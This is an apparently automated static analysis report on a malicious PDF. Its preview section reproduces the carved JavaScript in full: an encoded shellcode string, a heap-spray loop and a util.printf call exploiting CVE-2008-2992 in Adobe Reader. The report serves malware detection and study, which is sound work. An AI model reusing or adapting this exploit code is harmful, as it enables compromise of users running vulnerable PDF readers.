Malicious PDF — malware analysis report

Static analysis result for SHA-256 eec27edd3e23d511…

MALICIOUS

PDF

Size: 4.3 KB
Created: 2008-08-06 01:42:27
Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12)
First seen: 2026-05-08
MD5: 6e21e274830eada0e8b9007c79c5ee76
SHA-1: 6ce6c3fc30f18d4549d2636397bf5bf2fdb5fcd7
SHA-256: eec27edd3e23d5112c6aa8f611aca92cac690df63533bcc68c69023361cf6e7f
Risk Score: 268

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT' and 'PDF_JS'. The JavaScript stream, named 'javascript_obj0013_001.js', appears to be obfuscated, as suggested by the 'PDF_UNESCAPE' firing and the 'Script obfuscation indicators' in the static triage. The primary function of this script is likely to download and execute a second-stage payload, although the exact mechanism is obscured. The document body contains fragments that resemble JavaScript code and string concatenations, further supporting the malicious script execution.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • util.printf — CVE-2008-2992 | critical | CVE exact | CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure.
  • JavaScript action | low | 2 related findings | PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster | critical | PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u1C13" +
  • Embedded JS stream | low | PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage | high | PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Malformed active-content stream length | medium | PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 6

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x3DC | 2774 bytes
SHA-256: dd217d0fd6a6dbbd34e100b50bd16b8911297985e37580ee28525226e2a07a71
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
zFHYxkRYCwD2=unescape("%uC929%uE983%uD9A4%uD9EE%u2474%u5BF4%u7381%u1C13" +
                         "%u5BF7%u834D%uFCEB%uF4E2%uE7F7%u0701%u3E2F%uF43D" +
                         "%uF620%u79DB%u6E16%uB7B9%uF2F7%uA6B3%u08E3%u3DA4" +
                         "%u6E50%uD4C2%u0ADF%uE463%u6E85%u5FC2%u62C5%uA449" +
                         "%uC399%u9449%uE58D%u5F1A%u52F6%uA049%u169B%u27C1" +
                         "%u100E%uD7E2%uE57E%uC08C%u83B6%u8394%uE5D4%uD7FD" +
                         "%uE57E%uBE30%u378B%u7231%u66F1%u8B9B%uA906%u91C6" +
                         "%u8767%u8B9B%uE5DB%u5F0F%u4AC3%u17C1%u8F54%u15C1" +
                         "%uA7B6%u5FA4%uE58D%uC884%uAD86%u3503%u6D87%u5F03" +
                         "%u6D85%u5F01%uE57F%u5735%u6043%u0449%u6AEF%u3C9B" +
                         "%u6ED5%uD4C2%uA806%u86CF%u91D3%u2895%uE5DF%uBE1A" +
                         "%u3784%uE92A%u6E85%u57C2%u7D43%u9294%u5005%uA142" +
                         "%uEE7F%u54F4%uEDDB%uF42E%uB20E%uF4A8%u91D6%u3895" +
                         "%u6A42%u88C1%u40E4%u13A7%u6DC1%uACC6%u6EE0%uE7C2" +
                         "%u3E45%u8792%u3ED3%u833D%uE579%u841E%u91D6%u2495" +
                         "%u91D5%u2095%uAEB6%u516E%u1B45%u853B%u38D7%u2B91" +
                         "%u3457%u7F9B%u8067%u14F1%u8646%u2BE4%u917A%uB185" +
                         "%u3EF1%uBBB0%u2FE6%uB0A6%u0BF7%uA7B1%u2985%uA0A7" +
                         "%u17D6%uA0B1%u03E0%uBD86%u0BF7%uA0A1%u1CEA%u95BB" +
                         "%u3985%uBAAB%u16C0%uB7A7%u2B85%uBDBA%u3AF1%uA6AA" +
                         "%u0FE0%uD4A6%u01C9%uB0A3%u07C9%uA6A0%u1CE4%u95BB" +
                         "%u1B85%uB8B0%u01E8%uD4AC%u3CD0%u908E%u19EA%uB8AC" +
                         "%u0FEA%u80A6%u28EA%uB8AB%u2FE0%u25C2%u8368%u772B" +
                         "%uD833%u3E32%u846C%u786B%u9432%u2034%u9133%u2132" +
                         "%uC479%u2875%u9264%u4DDB");
						 
var QtSX7FFMO5Yh=unescape("%u0"+"A0A%u"+"0A0A");
var JjSyR=20;
var exh8jb=JjSyR+zFHYxkRYCwD2.length;
while(QtSX7FFMO5Yh.length<exh8jb)QtSX7FFMO5Yh+=QtSX7FFMO5Yh;
var qViE7Tw=QtSX7FFMO5Yh.substring(0,exh8jb);
var uIm38I7M=QtSX7FFMO5Yh.substring(0,QtSX7FFMO5Yh.length-exh8jb);
while(uIm38I7M.length+exh8jb<0x60000)uIm38I7M=uIm38I7M+uIm38I7M+qViE7Tw;
var vIpNxCz5kqu3=new Array();
for(v0FN43s=0;
v0FN43s<1200;v0FN43s++){vIpNxCz5kqu3[v0FN43s]=uIm38I7M+zFHYxkRYCwD2}
var gipW5Eb=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45"+"000f",gipW5Eb);
javascript_obj0013_002.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x402 | 3410 bytes
SHA-256: 276c72f2ea0276f9ad7fa9708a0044e5a735ea773c31f571d1a2252eac53712f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x3DC | 2021 bytes
SHA-256: 7f2f8191caf23a9e743b37b2f8198b1ead7dc975023452f2224048be55403519
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
generic_stage_recovery_001.js | deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 13 at offset 0x402 | 2657 bytes
SHA-256: 3085edd5a8c34867d8e1b099b79d06daa44eed19295062e5f224abbe4c1316f5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
generic_stage_recovery_002.js | deobfuscated-js | generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0x11 | 4699 bytes
SHA-256: 63bd64885d858b5081c774faa46257cf4d6b3742164927fada5abcc7a123ac17
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
this.lhF0pCJES29x()
combined_document_js_000.js | deobfuscated-js | combined document JavaScript streams at offset 0x11 | 6205 bytes
SHA-256: 9947b3d43b6edfae902dcd579f1656d881ceea832c946dd09f71007bd2ea167f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).